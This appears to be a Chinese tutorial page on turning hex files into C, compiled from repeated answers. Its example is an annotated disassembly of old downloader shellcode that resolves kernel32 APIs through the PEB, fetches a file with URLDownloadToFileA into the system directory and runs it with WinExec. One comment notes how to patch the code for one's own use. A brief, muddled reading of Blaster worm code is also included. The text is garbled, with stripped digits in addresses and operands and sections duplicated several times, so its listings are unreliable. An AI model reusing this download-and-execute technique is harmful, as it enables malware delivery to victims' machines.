       4AD    5E                     pop     esi

       4AD    8BCD                   mov     ecx, ebp                                      ; 计数保存于ecx

       4AD    8B                 mov     eax, dword ptr [esi+]                       ; esi+0x Ordinal序号表偏移地址

       4AD    C3                   add     eax, ebx                                      ; ordinal序号表的虚拟地址

       4AD    D1E1                   shl     ecx, 1                                        ; ecx逻辑增加2倍  因为ordinal序号是WOR类型下面是通过add 来求ordinal所以这里必须扩大2倍

       4ADB    C1                   add     eax, ecx

       4ADD    C9                   xor     ecx, ecx                                      ; ecx=0

       4ADF    :8B                mov     cx, word ptr [eax]                            ; 保存取出的ordinal序号

       4AD    8B 1C                mov     eax, dword ptr [esi+1C]                       ; eax 为kenrnel.dll的EAT的偏移地址

       4AD >  C3                   add     eax, ebx                                      ; eax = kernel.dll的eat虚拟地址

       4AD    C1E1                 shl     ecx, 2                                        ; 同上,扩大4倍因为eat中元素为DWORD值

       4ADA    C1                   add     eax, ecx

       4ADC    8B                   mov     eax, dword ptr [eax]                          ; eax即为GetProcAddress函数的地址 相对虚拟地址,EAT中保存的RVA

       4ADE    C3                   add     eax, ebx                                      ; 与基址相加求得GetProcAddress函数的虚拟地址

       4AD    8BFA                   mov     edi, edx                                      ; GetProcAddress字符到edi

       4AD    8BF7                   mov     esi, edi                                      ; esi保存GetProcAddress地址

       4AD    C6 0E                add     esi, 0E                                       ; esi指向GetProcAddress字符串的末地址

       4AD    8BD0                   mov     edx, eax                                      ; edx为GetProcAddress的地址

       4AD    6A                   push    4

       4ADB                         pop     ecx                                           ; ecx=4

       有经验的程序员, 通过分析即明白上面反汇编代码的主要目的就是获取GetProcAddress函数的地址。继续看反汇编代码:

       4ADC    E8             call    4ADE1                                      ; 设置IAT 得到4个函数的地址

       4AD    C6 0D                add     esi, 0D                                       ; 从这里开始实现ShellCode的真正功能

       4AD                         push    edx

       4AD                         push    esi                                           ; urlmon

       4AD    FF FC                call    dword ptr [edi-4]                             ; 调用LoadLibrarA来加载urlmon.dll

       4AD    5A                     pop     edx                                           ; edx = GetProcAddress的地址

       4ADA    8BD8                   mov     ebx, eax

       4ADC    6A                   push    1

       4ADE                         pop     ecx

       4ADF    E8 3D            call    4ADE1                                      ; 再次设置 IAT 得到URLDownLoadToFileA

       4ADA4    C6                 add     esi,                                        ; esi指向URLDownLoadToFileA的末地址

       4ADA7                         push    esi

       4ADA8                         inc     esi

       4ADA9    E                 cmp     byte ptr [esi],                             ; 判断esi是否为0x 这里在原码中有0x如果要自己用,应该加上一个字节用于表示程序结束

       4ADAC  ^  FA                  jnz     short 4ADA8                                ; 跨过这个跳转,需要在OD中CTRL+E修改数据为0x

       4ADAE                     xor     byte ptr [esi], 

       4ADB1    5E                     pop     esi

       4ADB2    EC                 sub     esp,                                        ; 开辟  byte栈空间

       4ADB5 >  8BDC                   mov     ebx, esp                                      ; ebx为栈区的指针

       4ADB7    6A                   push    

       4ADB9                         push    ebx

       4ADBA    FF EC                call    dword ptr [edi-]                            ; 调用GetSystemDirectoryA得到系统目录

       4ADBD    C 5CE        mov     dword ptr [ebx+eax], EC                 ; ebx+0x 系统路径占 0x个字节

       4ADC4    C       mov     dword ptr [ebx+eax+4],                    ; 拼接下载后的文件路径%systemroot%\system\a.exe

       4ADCC    C0                   xor     eax, eax

       4ADCE                         push    eax

       4ADCF                         push    eax

       4ADD0                         push    ebx

       4ADD1                         push    esi

       4ADD2                         push    eax

       4ADD3 >  FF FC                call    dword ptr [edi-4]                             ; URLDownLoadToFile下载文件为a.exe

       4ADD6    8BDC                   mov     ebx, esp

       4ADD8                         push    eax

       4ADD9                         push    ebx

       4ADDA    FF F0                call    dword ptr [edi-]                            ; WinExec执行代码

       4ADDD                         push    eax

       4ADDE    FF F4                call    dword ptr [edi-C]                             ; ExitThread退出线程

       接下来的操作便是通过已获得地址的GetProcAddress()来分别得到GetSystemDirectory()、URLDownLoadToFile()、WinExec()及ExitProcess()函数的地址,并依次执行。到这里实际上有经验的程序员,马上就能写出C语言代码来。 后面的数据区不在分析了,主要是介绍如何操作。

       使用C语言,虽然知道了Hex文件的大致流程,但是一般来说,对于汇编指令,更倾向于直接使用asm关键字来使用内联汇编。如下图所示:

       通过这个实例 ,相信应该能理解一个大致的流程啦。

hex文件如何转化成C语言?

       文件有两种,一种是文本文件,一种是程序二进制文件,不管哪种文件都可以用十六进制编码来显示,称为hex文件。

       1、文本Hex文件一般不需要转成C语言,更多的是程序二进制文件,用十六进制显示,可以转换成C语言,一般使用相应的反汇编程序来实现,这方面的工具很多,不同的平台略有不同。Windows平台一般常用的OllyDbg、Windbg、IDA,Linux平台使用最多的是GDB和Linux版的IDA。

       OllyDbg,简称OD,一般是软件逆向工程爱好者,最先使用的一个工具,但是因为当下不在更新,所以一般用一般用于学习使用,下图中左上角的区域即为反汇编区域 ,用户可以根据汇编指令,分析程序算法,然后自己编写代码。

        在Windows平台,特别是x平台,最好用的反汇编工具除还得是Windbg。将程序载入Windbg后,可以输入u命令来查看程序的反汇编代码。

       2、对于编程人员来说,逆向分析是一个基本的技能,但是往往不容易入门,这里举一个例子。以一段早些年ShellCode的十六进制代码为例,代码如下图所示,这段不起眼的代码,实际上实现了一个下载者的功能。

       拿到这样的十六进制代码,一般来说,先将其生成二进制文件,然后再分析其指令,通过反汇编指令再写出源码。只需要将上面的十六进制代码,保存到C语言的字符串数组中,写入到一个Exe的文件空段中,再修改指令将其跳转到程序入口处即可,这个过程类似于软件安全领域的壳。

       将十六进制代码写入一个exe文件后,就可以将exe文件载入动态调试器进行动态分析或者使用静态反汇编程序进行静态分析,两者的不同在于动态调试器是要运行程序的,而静态反汇编分析不需要运行程序,所以一般恶意程序,都采用静态分析。反汇编开头的一段十六进制代码注释如下:

       4AD    5A                     pop     edx                                           ; 函数返回的地址保存到edx中

       4AD    :A1          mov     eax, dword ptr fs:[]                        ; 取peb

       4AD    8B 0C                mov     eax, dword ptr [eax+C]                        ; peb_link

       4ADB    8B 1C                mov     esi, dword ptr [eax+1C]                       ; 初始化列表到esi

       4ADE    AD                     lods    dword ptr [esi]                               ; [esi]->eax + 8的位置即kernel.dll的地址

       4ADF    8B                 mov     eax, dword ptr [eax+8]                        ; eax=kernel.dll的地址

       4AD    8BD8                   mov     ebx, eax                                      ; ebx=kernel.dll的基址

       4AD    8B 3C                mov     esi, dword ptr [ebx+3C]                       ; esi = pe头偏移

       4AD    8BE               mov     esi, dword ptr [esi+ebx+]                   ; esi为kernel.dll导出表的偏移

       4ADB    F3                   add     esi, ebx                                      ; esi = kernel.dll导出表的虚拟地址

       4ADD    8B7E                 mov     edi, dword ptr [esi+]                       ; edi=ent的偏移地址

       4AD    FB                   add     edi, ebx                                      ; edi = ent的虚拟地址

       4AD    8B4E                 mov     ecx, dword ptr [esi+]                       ; ecx = kernel.dll导出地址的个数

       4AD    ED                   xor     ebp, ebp                                      ; ebp=0

       4AD                         push    esi                                           ; 保存导出表虚拟地址

       4AD                         push    edi                                           ; 保存ent虚拟地址

       4AD                         push    ecx                                           ; 保存计数

       4ADA    8B3F                   mov     edi, dword ptr [edi]

       4ADC    FB                   add     edi, ebx                                      ; 定位ent中的函数名

       4ADE    8BF2                   mov     esi, edx                                      ; esi为 要查询的函数GetProcAddress即该call的下一个地址是数据

       4AD    6A 0E                  push    0E                                            ; 0xe0是GetProcAddress函数的字符个数

       4AD                         pop     ecx                                           ; 设置循环次数为 0xe

       4AD    F3:A6                  repe    cmps byte ptr es:[edi], byte ptr [esi]        ; ecx!=0&&zf=1 ecx=ecx-1 cmps判断 GetProcAddress

       4AD                       je      short 4ADF                                ; 如果ENT中的函数名为GetProcAddress跳走

       4AD                         pop     ecx                                           ; 不相等则将导出地址数出栈

       4AD    5F                     pop     edi                                           ; ent虚拟地址出栈

       4AD    C7                 add     edi, 4                                        ; edi地址递增4字节 因为ENT的元素大小为4字节

       4ADC                         inc     ebp                                           ; ebp用于保存ent中定位到GetProcAddress函数时的计数

       4ADD  ^ E2 E9                  loopd   short 4AD                                ; 循环查询

       4ADF                         pop     ecx

       4AD    5F                     pop     edi

       4AD    5E                     pop     esi

       4AD    8BCD                   mov     ecx, ebp                                      ; 计数保存于ecx

       4AD    8B                 mov     eax, dword ptr [esi+]                       ; esi+0x Ordinal序号表偏移地址

       4AD    C3                   add     eax, ebx                                      ; ordinal序号表的虚拟地址

       4AD    D1E1                   shl     ecx, 1                                        ; ecx逻辑增加2倍  因为ordinal序号是WOR类型下面是通过add 来求ordinal所以这里必须扩大2倍

       4ADB    C1                   add     eax, ecx

       4ADD    C9                   xor     ecx, ecx                                      ; ecx=0

       4ADF    :8B                mov     cx, word ptr [eax]                            ; 保存取出的ordinal序号

       4AD    8B 1C                mov     eax, dword ptr [esi+1C]                       ; eax 为kenrnel.dll的EAT的偏移地址

       4AD >  C3                   add     eax, ebx                                      ; eax = kernel.dll的eat虚拟地址

       4AD    C1E1                 shl     ecx, 2                                        ; 同上,扩大4倍因为eat中元素为DWORD值

       4ADA    C1                   add     eax, ecx

       4ADC    8B                   mov     eax, dword ptr [eax]                          ; eax即为GetProcAddress函数的地址 相对虚拟地址,EAT中保存的RVA

       4ADE    C3                   add     eax, ebx                                      ; 与基址相加求得GetProcAddress函数的虚拟地址

       4AD    8BFA                   mov     edi, edx                                      ; GetProcAddress字符到edi

       4AD    8BF7                   mov     esi, edi                                      ; esi保存GetProcAddress地址

       4AD    C6 0E                add     esi, 0E                                       ; esi指向GetProcAddress字符串的末地址

       4AD    8BD0                   mov     edx, eax                                      ; edx为GetProcAddress的地址

       4AD    6A                   push    4

       4ADB                         pop     ecx                                           ; ecx=4

       有经验的程序员, 通过分析即明白上面反汇编代码的主要目的就是获取GetProcAddress函数的地址。继续看反汇编代码:

       4ADC    E8             call    4ADE1                                      ; 设置IAT 得到4个函数的地址

       4AD    C6 0D                add     esi, 0D                                       ; 从这里开始实现ShellCode的真正功能

       4AD                         push    edx

       4AD                         push    esi                                           ; urlmon

       4AD    FF FC                call    dword ptr [edi-4]                             ; 调用LoadLibrarA来加载urlmon.dll

       4AD    5A                     pop     edx                                           ; edx = GetProcAddress的地址

       4ADA    8BD8                   mov     ebx, eax

       4ADC    6A                   push    1

       4ADE                         pop     ecx

       4ADF    E8 3D            call    4ADE1                                      ; 再次设置 IAT 得到URLDownLoadToFileA

       4ADA4    C6                 add     esi,                                        ; esi指向URLDownLoadToFileA的末地址

       4ADA7                         push    esi

       4ADA8                         inc     esi

       4ADA9    E                 cmp     byte ptr [esi],                             ; 判断esi是否为0x 这里在原码中有0x如果要自己用,应该加上一个字节用于表示程序结束

       4ADAC  ^  FA                  jnz     short 4ADA8                                ; 跨过这个跳转,需要在OD中CTRL+E修改数据为0x

       4ADAE                     xor     byte ptr [esi], 

       4ADB1    5E                     pop     esi

       4ADB2    EC                 sub     esp,                                        ; 开辟  byte栈空间

       4ADB5 >  8BDC                   mov     ebx, esp                                      ; ebx为栈区的指针

       4ADB7    6A                   push    

       4ADB9                         push    ebx

       4ADBA    FF EC                call    dword ptr [edi-]                            ; 调用GetSystemDirectoryA得到系统目录

       4ADBD    C 5CE        mov     dword ptr [ebx+eax], EC                 ; ebx+0x 系统路径占 0x个字节

       4ADC4    C       mov     dword ptr [ebx+eax+4],                    ; 拼接下载后的文件路径%systemroot%\system\a.exe

       4ADCC    C0                   xor     eax, eax

       4ADCE                         push    eax

       4ADCF                         push    eax

       4ADD0                         push    ebx

       4ADD1                         push    esi

       4ADD2                         push    eax

       4ADD3 >  FF FC                call    dword ptr [edi-4]                             ; URLDownLoadToFile下载文件为a.exe

       4ADD6    8BDC                   mov     ebx, esp

       4ADD8                         push    eax

       4ADD9                         push    ebx

       4ADDA    FF F0                call    dword ptr [edi-]                            ; WinExec执行代码

       4ADDD                         push    eax

       4ADDE    FF F4                call    dword ptr [edi-C]                             ; ExitThread退出线程

       接下来的操作便是通过已获得地址的GetProcAddress()来分别得到GetSystemDirectory()、URLDownLoadToFile()、WinExec()及ExitProcess()函数的地址,并依次执行。到这里实际上有经验的程序员,马上就能写出C语言代码来。 后面的数据区不在分析了,主要是介绍如何操作。

       使用C语言,虽然知道了Hex文件的大致流程,但是一般来说,对于汇编指令,更倾向于直接使用asm关键字来使用内联汇编。如下图所示:

       通过这个实例 ,相信应该能理解一个大致的流程啦。

冲击波病毒病毒反汇编源码

       这部分代码是冲击波病毒的反汇编源码片段,它包含了多个指令和操作。首先,有两条指令(F6 and esi,esi 和 1AFC sbb bh,ah)对esi和esi以及bh和ah进行操作。接下来的( DDDC xor eax,4DC9DD3)执行异或操作,改变eax的值。然后是pop edx,wait和cli指令,可能用于控制程序流程和中断处理。

       在后面的代码中,有mov ebp,FFD和mov dl,0C3等,用以设置内存地址和执行特定操作。cmps指令用于比较内存中的字节,push esp和inc/dec esi等操作用于数据处理。未知命令(E2 F4 loopd和C6?)可能代表未识别的循环指令。test al,7B和jpo等指令用于条件判断。

       最后,代码中包含了ret指令(C3),用于返回到上一层调用,以及一系列的内存操作,如lea edi,edi,mov ah,0D8,out dx,eax等,可能用于数据交换和输出。整体来看,这部分源码执行了一系列复杂的指令,用于执行病毒的特定功能,如数据比较、内存操作和控制流程。

扩展资料

       冲击波(Worm.Blaster)病毒是利用微软公司在7月日公布的RPC漏洞进行传播的,只要是计算机上有RPC服务并且没有打安全补丁的计算机都存在有RPC漏洞,具体涉及的操作系统是:Windows、XP、Server 。

如何将hex文件转为c语言?

       文件有两种,一种是文本文件,一种是程序二进制文件,不管哪种文件都可以用十六进制编码来显示,称为hex文件。

       1、文本Hex文件一般不需要转成C语言,更多的是程序二进制文件,用十六进制显示,可以转换成C语言,一般使用相应的反汇编程序来实现,这方面的工具很多,不同的平台略有不同。Windows平台一般常用的OllyDbg、Windbg、IDA,Linux平台使用最多的是GDB和Linux版的IDA。

       OllyDbg,简称OD,一般是软件逆向工程爱好者,最先使用的一个工具,但是因为当下不在更新,所以一般用一般用于学习使用,下图中左上角的区域即为反汇编区域 ,用户可以根据汇编指令,分析程序算法,然后自己编写代码。

        在Windows平台,特别是x平台,最好用的反汇编工具除还得是Windbg。将程序载入Windbg后,可以输入u命令来查看程序的反汇编代码。

       2、对于编程人员来说,逆向分析是一个基本的技能,但是往往不容易入门,这里举一个例子。以一段早些年ShellCode的十六进制代码为例,代码如下图所示,这段不起眼的代码,实际上实现了一个下载者的功能。

       拿到这样的十六进制代码,一般来说,先将其生成二进制文件,然后再分析其指令,通过反汇编指令再写出源码。只需要将上面的十六进制代码,保存到C语言的字符串数组中,写入到一个Exe的文件空段中,再修改指令将其跳转到程序入口处即可,这个过程类似于软件安全领域的壳。

       将十六进制代码写入一个exe文件后,就可以将exe文件载入动态调试器进行动态分析或者使用静态反汇编程序进行静态分析,两者的不同在于动态调试器是要运行程序的,而静态反汇编分析不需要运行程序,所以一般恶意程序,都采用静态分析。反汇编开头的一段十六进制代码注释如下:

       4AD    5A                     pop     edx                                           ; 函数返回的地址保存到edx中

       4AD    :A1          mov     eax, dword ptr fs:[]                        ; 取peb

       4AD    8B 0C                mov     eax, dword ptr [eax+C]                        ; peb_link

       4ADB    8B 1C                mov     esi, dword ptr [eax+1C]                       ; 初始化列表到esi

       4ADE    AD                     lods    dword ptr [esi]                               ; [esi]->eax + 8的位置即kernel.dll的地址

       4ADF    8B                 mov     eax, dword ptr [eax+8]                        ; eax=kernel.dll的地址

       4AD    8BD8                   mov     ebx, eax                                      ; ebx=kernel.dll的基址

       4AD    8B 3C                mov     esi, dword ptr [ebx+3C]                       ; esi = pe头偏移

       4AD    8BE               mov     esi, dword ptr [esi+ebx+]                   ; esi为kernel.dll导出表的偏移

       4ADB    F3                   add     esi, ebx                                      ; esi = kernel.dll导出表的虚拟地址

       4ADD    8B7E                 mov     edi, dword ptr [esi+]                       ; edi=ent的偏移地址

       4AD    FB                   add     edi, ebx                                      ; edi = ent的虚拟地址

       4AD    8B4E                 mov     ecx, dword ptr [esi+]                       ; ecx = kernel.dll导出地址的个数

       4AD    ED                   xor     ebp, ebp                                      ; ebp=0

       4AD                         push    esi                                           ; 保存导出表虚拟地址

       4AD                         push    edi                                           ; 保存ent虚拟地址

       4AD                         push    ecx                                           ; 保存计数

       4ADA    8B3F                   mov     edi, dword ptr [edi]

       4ADC    FB                   add     edi, ebx                                      ; 定位ent中的函数名

       4ADE    8BF2                   mov     esi, edx                                      ; esi为 要查询的函数GetProcAddress即该call的下一个地址是数据

       4AD    6A 0E                  push    0E                                            ; 0xe0是GetProcAddress函数的字符个数

       4AD                         pop     ecx                                           ; 设置循环次数为 0xe

       4AD    F3:A6                  repe    cmps byte ptr es:[edi], byte ptr [esi]        ; ecx!=0&&zf=1 ecx=ecx-1 cmps判断 GetProcAddress

       4AD                       je      short 4ADF                                ; 如果ENT中的函数名为GetProcAddress跳走

       4AD                         pop     ecx                                           ; 不相等则将导出地址数出栈

       4AD    5F                     pop     edi                                           ; ent虚拟地址出栈

       4AD    C7                 add     edi, 4                                        ; edi地址递增4字节 因为ENT的元素大小为4字节

       4ADC                         inc     ebp                                           ; ebp用于保存ent中定位到GetProcAddress函数时的计数

       4ADD  ^ E2 E9                  loopd   short 4AD                                ; 循环查询

       4ADF                         pop     ecx

       4AD    5F                     pop     edi

       4AD    5E                     pop     esi

       4AD    8BCD                   mov     ecx, ebp                                      ; 计数保存于ecx

       4AD    8B                 mov     eax, dword ptr [esi+]                       ; esi+0x Ordinal序号表偏移地址

       4AD    C3                   add     eax, ebx                                      ; ordinal序号表的虚拟地址

       4AD    D1E1                   shl     ecx, 1                                        ; ecx逻辑增加2倍  因为ordinal序号是WOR类型下面是通过add 来求ordinal所以这里必须扩大2倍

       4ADB    C1                   add     eax, ecx

       4ADD    C9                   xor     ecx, ecx                                      ; ecx=0

       4ADF    :8B                mov     cx, word ptr [eax]                            ; 保存取出的ordinal序号

       4AD    8B 1C                mov     eax, dword ptr [esi+1C]                       ; eax 为kenrnel.dll的EAT的偏移地址

       4AD >  C3                   add     eax, ebx                                      ; eax = kernel.dll的eat虚拟地址

       4AD    C1E1                 shl     ecx, 2                                        ; 同上,扩大4倍因为eat中元素为DWORD值

       4ADA    C1                   add     eax, ecx

       4ADC    8B                   mov     eax, dword ptr [eax]                          ; eax即为GetProcAddress函数的地址 相对虚拟地址,EAT中保存的RVA

       4ADE    C3                   add     eax, ebx                                      ; 与基址相加求得GetProcAddress函数的虚拟地址

       4AD    8BFA                   mov     edi, edx                                      ; GetProcAddress字符到edi

       4AD    8BF7                   mov     esi, edi                                      ; esi保存GetProcAddress地址

       4AD    C6 0E                add     esi, 0E                                       ; esi指向GetProcAddress字符串的末地址

       4AD    8BD0                   mov     edx, eax                                      ; edx为GetProcAddress的地址

       4AD    6A                   push    4

       4ADB                         pop     ecx                                           ; ecx=4

       有经验的程序员, 通过分析即明白上面反汇编代码的主要目的就是获取GetProcAddress函数的地址。继续看反汇编代码:

       4ADC    E8             call    4ADE1                                      ; 设置IAT 得到4个函数的地址

       4AD    C6 0D                add     esi, 0D                                       ; 从这里开始实现ShellCode的真正功能

       4AD                         push    edx

       4AD                         push    esi                                           ; urlmon

       4AD    FF FC                call    dword ptr [edi-4]                             ; 调用LoadLibrarA来加载urlmon.dll

       4AD    5A                     pop     edx                                           ; edx = GetProcAddress的地址

       4ADA    8BD8                   mov     ebx, eax

       4ADC    6A                   push    1

       4ADE                         pop     ecx

       4ADF    E8 3D            call    4ADE1                                      ; 再次设置 IAT 得到URLDownLoadToFileA

       4ADA4    C6                 add     esi,                                        ; esi指向URLDownLoadToFileA的末地址

       4ADA7                         push    esi

       4ADA8                         inc     esi

       4ADA9    E                 cmp     byte ptr [esi],                             ; 判断esi是否为0x 这里在原码中有0x如果要自己用,应该加上一个字节用于表示程序结束

       4ADAC  ^  FA                  jnz     short 4ADA8                                ; 跨过这个跳转,需要在OD中CTRL+E修改数据为0x

       4ADAE                     xor     byte ptr [esi], 

       4ADB1    5E                     pop     esi

       4ADB2    EC                 sub     esp,                                        ; 开辟  byte栈空间

       4ADB5 >  8BDC                   mov     ebx, esp                                      ; ebx为栈区的指针

       4ADB7    6A                   push    

       4ADB9                         push    ebx

       4ADBA    FF EC                call    dword ptr [edi-]                            ; 调用GetSystemDirectoryA得到系统目录

       4ADBD    C 5CE        mov     dword ptr [ebx+eax], EC                 ; ebx+0x 系统路径占 0x个字节

       4ADC4    C       mov     dword ptr [ebx+eax+4],                    ; 拼接下载后的文件路径%systemroot%\system\a.exe

       4ADCC    C0                   xor     eax, eax

       4ADCE                         push    eax

       4ADCF                         push    eax

       4ADD0                         push    ebx

       4ADD1                         push    esi

       4ADD2                         push    eax

       4ADD3 >  FF FC                call    dword ptr [edi-4]                             ; URLDownLoadToFile下载文件为a.exe

       4ADD6    8BDC                   mov     ebx, esp

       4ADD8                         push    eax

       4ADD9                         push    ebx

       4ADDA    FF F0                call    dword ptr [edi-]                            ; WinExec执行代码

       4ADDD                         push    eax

       4ADDE    FF F4                call    dword ptr [edi-C]                             ; ExitThread退出线程

       接下来的操作便是通过已获得地址的GetProcAddress()来分别得到GetSystemDirectory()、URLDownLoadToFile()、WinExec()及ExitProcess()函数的地址,并依次执行。到这里实际上有经验的程序员,马上就能写出C语言代码来。 后面的数据区不在分析了,主要是介绍如何操作。

       使用C语言,虽然知道了Hex文件的大致流程,但是一般来说,对于汇编指令,更倾向于直接使用asm关键字来使用内联汇编。如下图所示:

       通过这个实例 ,相信应该能理解一个大致的流程啦。

hex文件如何转成C语言?

       文件有两种,一种是文本文件,一种是程序二进制文件,不管哪种文件都可以用十六进制编码来显示,称为hex文件。

       1、文本Hex文件一般不需要转成C语言,更多的是程序二进制文件,用十六进制显示,可以转换成C语言,一般使用相应的反汇编程序来实现,这方面的工具很多,不同的平台略有不同。Windows平台一般常用的OllyDbg、Windbg、IDA,Linux平台使用最多的是GDB和Linux版的IDA。

       OllyDbg,简称OD,一般是软件逆向工程爱好者,最先使用的一个工具,但是因为当下不在更新,所以一般用一般用于学习使用,下图中左上角的区域即为反汇编区域 ,用户可以根据汇编指令,分析程序算法,然后自己编写代码。

        在Windows平台,特别是x平台,最好用的反汇编工具除还得是Windbg。将程序载入Windbg后,可以输入u命令来查看程序的反汇编代码。

       2、对于编程人员来说,逆向分析是一个基本的技能,但是往往不容易入门,这里举一个例子。以一段早些年ShellCode的十六进制代码为例,代码如下图所示,这段不起眼的代码,实际上实现了一个下载者的功能。

       拿到这样的十六进制代码,一般来说,先将其生成二进制文件,然后再分析其指令,通过反汇编指令再写出源码。只需要将上面的十六进制代码,保存到C语言的字符串数组中,写入到一个Exe的文件空段中,再修改指令将其跳转到程序入口处即可,这个过程类似于软件安全领域的壳。

       将十六进制代码写入一个exe文件后,就可以将exe文件载入动态调试器进行动态分析或者使用静态反汇编程序进行静态分析,两者的不同在于动态调试器是要运行程序的,而静态反汇编分析不需要运行程序,所以一般恶意程序,都采用静态分析。反汇编开头的一段十六进制代码注释如下:

       4AD    5A                     pop     edx                                           ; 函数返回的地址保存到edx中

       4AD    :A1          mov     eax, dword ptr fs:[]                        ; 取peb

       4AD    8B 0C                mov     eax, dword ptr [eax+C]                        ; peb_link

       4ADB    8B 1C                mov     esi, dword ptr [eax+1C]                       ; 初始化列表到esi

       4ADE    AD                     lods    dword ptr [esi]                               ; [esi]->eax + 8的位置即kernel.dll的地址

       4ADF    8B                 mov     eax, dword ptr [eax+8]                        ; eax=kernel.dll的地址

       4AD    8BD8                   mov     ebx, eax                                      ; ebx=kernel.dll的基址

       4AD    8B 3C                mov     esi, dword ptr [ebx+3C]                       ; esi = pe头偏移

       4AD    8BE               mov     esi, dword ptr [esi+ebx+]                   ; esi为kernel.dll导出表的偏移

       4ADB    F3                   add     esi, ebx                                      ; esi = kernel.dll导出表的虚拟地址

       4ADD    8B7E                 mov     edi, dword ptr [esi+]                       ; edi=ent的偏移地址

       4AD    FB                   add     edi, ebx                                      ; edi = ent的虚拟地址

       4AD    8B4E                 mov     ecx, dword ptr [esi+]                       ; ecx = kernel.dll导出地址的个数

       4AD    ED                   xor     ebp, ebp                                      ; ebp=0

       4AD                         push    esi                                           ; 保存导出表虚拟地址

       4AD                         push    edi                                           ; 保存ent虚拟地址

       4AD                         push    ecx                                           ; 保存计数

       4ADA    8B3F                   mov     edi, dword ptr [edi]

       4ADC    FB                   add     edi, ebx                                      ; 定位ent中的函数名

       4ADE    8BF2                   mov     esi, edx                                      ; esi为 要查询的函数GetProcAddress即该call的下一个地址是数据

       4AD    6A 0E                  push    0E                                            ; 0xe0是GetProcAddress函数的字符个数

       4AD                         pop     ecx                                           ; 设置循环次数为 0xe

       4AD    F3:A6                  repe    cmps byte ptr es:[edi], byte ptr [esi]        ; ecx!=0&&zf=1 ecx=ecx-1 cmps判断 GetProcAddress

       4AD                       je      short 4ADF                                ; 如果ENT中的函数名为GetProcAddress跳走

       4AD                         pop     ecx                                           ; 不相等则将导出地址数出栈

       4AD    5F                     pop     edi                                           ; ent虚拟地址出栈

       4AD    C7                 add     edi, 4                                        ; edi地址递增4字节 因为ENT的元素大小为4字节

       4ADC                         inc     ebp                                           ; ebp用于保存ent中定位到GetProcAddress函数时的计数

       4ADD  ^ E2 E9                  loopd   short 4AD                                ; 循环查询

       4ADF                         pop     ecx

       4AD    5F                     pop     edi

       4AD    5E                     pop     esi

       4AD    8BCD                   mov     ecx, ebp                                      ; 计数保存于ecx

       4AD    8B                 mov     eax, dword ptr [esi+]                       ; esi+0x Ordinal序号表偏移地址

       4AD    C3                   add     eax, ebx                                      ; ordinal序号表的虚拟地址

       4AD    D1E1                   shl     ecx, 1                                        ; ecx逻辑增加2倍  因为ordinal序号是WOR类型下面是通过add 来求ordinal所以这里必须扩大2倍

       4ADB    C1                   add     eax, ecx

       4ADD    C9                   xor     ecx, ecx                                      ; ecx=0

       4ADF    :8B                mov     cx, word ptr [eax]                            ; 保存取出的ordinal序号

       4AD    8B 1C                mov     eax, dword ptr [esi+1C]                       ; eax 为kenrnel.dll的EAT的偏移地址

       4AD >  C3                   add     eax, ebx                                      ; eax = kernel.dll的eat虚拟地址

       4AD    C1E1                 shl     ecx, 2                                        ; 同上,扩大4倍因为eat中元素为DWORD值

       4ADA    C1                   add     eax, ecx

       4ADC    8B                   mov     eax, dword ptr [eax]                          ; eax即为GetProcAddress函数的地址 相对虚拟地址,EAT中保存的RVA

       4ADE    C3                   add     eax, ebx                                      ; 与基址相加求得GetProcAddress函数的虚拟地址

       4AD    8BFA                   mov     edi, edx                                      ; GetProcAddress字符到edi

       4AD    8BF7                   mov     esi, edi                                      ; esi保存GetProcAddress地址

       4AD    C6 0E                add     esi, 0E                                       ; esi指向GetProcAddress字符串的末地址

       4AD    8BD0                   mov     edx, eax                                      ; edx为GetProcAddress的地址

       4AD    6A                   push    4

       4ADB                         pop     ecx                                           ; ecx=4

       有经验的程序员, 通过分析即明白上面反汇编代码的主要目的就是获取GetProcAddress函数的地址。继续看反汇编代码:

       4ADC    E8             call    4ADE1                                      ; 设置IAT 得到4个函数的地址

       4AD    C6 0D                add     esi, 0D                                       ; 从这里开始实现ShellCode的真正功能

       4AD                         push    edx

       4AD                         push    esi                                           ; urlmon

       4AD    FF FC                call    dword ptr [edi-4]                             ; 调用LoadLibrarA来加载urlmon.dll

       4AD    5A                     pop     edx                                           ; edx = GetProcAddress的地址

       4ADA    8BD8                   mov     ebx, eax

       4ADC    6A                   push    1

       4ADE                         pop     ecx

       4ADF    E8 3D            call    4ADE1                                      ; 再次设置 IAT 得到URLDownLoadToFileA

       4ADA4    C6                 add     esi,                                        ; esi指向URLDownLoadToFileA的末地址

       4ADA7                         push    esi

       4ADA8                         inc     esi

       4ADA9    E                 cmp     byte ptr [esi],                             ; 判断esi是否为0x 这里在原码中有0x如果要自己用,应该加上一个字节用于表示程序结束

       4ADAC  ^  FA                  jnz     short 4ADA8                                ; 跨过这个跳转,需要在OD中CTRL+E修改数据为0x

       4ADAE                     xor     byte ptr [esi], 

       4ADB1    5E                     pop     esi

       4ADB2    EC                 sub     esp,                                        ; 开辟  byte栈空间

       4ADB5 >  8BDC                   mov     ebx, esp                                      ; ebx为栈区的指针

       4ADB7    6A                   push    

       4ADB9                         push    ebx

       4ADBA    FF EC                call    dword ptr [edi-]                            ; 调用GetSystemDirectoryA得到系统目录

       4ADBD    C 5CE        mov     dword ptr [ebx+eax], EC                 ; ebx+0x 系统路径占 0x个字节

       4ADC4    C       mov     dword ptr [ebx+eax+4],                    ; 拼接下载后的文件路径%systemroot%\system\a.exe

       4ADCC    C0                   xor     eax, eax

       4ADCE                         push    eax

       4ADCF                         push    eax

       4ADD0                         push    ebx

       4ADD1                         push    esi

       4ADD2                         push    eax

       4ADD3 >  FF FC                call    dword ptr [edi-4]                             ; URLDownLoadToFile下载文件为a.exe

       4ADD6    8BDC                   mov     ebx, esp

       4ADD8                         push    eax

       4ADD9                         push    ebx

       4ADDA    FF F0                call    dword ptr [edi-]                            ; WinExec执行代码

       4ADDD                         push    eax

       4ADDE    FF F4                call    dword ptr [edi-C]                             ; ExitThread退出线程

       接下来的操作便是通过已获得地址的GetProcAddress()来分别得到GetSystemDirectory()、URLDownLoadToFile()、WinExec()及ExitProcess()函数的地址,并依次执行。到这里实际上有经验的程序员,马上就能写出C语言代码来。 后面的数据区不在分析了,主要是介绍如何操作。

       使用C语言,虽然知道了Hex文件的大致流程,但是一般来说,对于汇编指令,更倾向于直接使用asm关键字来使用内联汇编。如下图所示:

       通过这个实例 ,相信应该能理解一个大致的流程啦。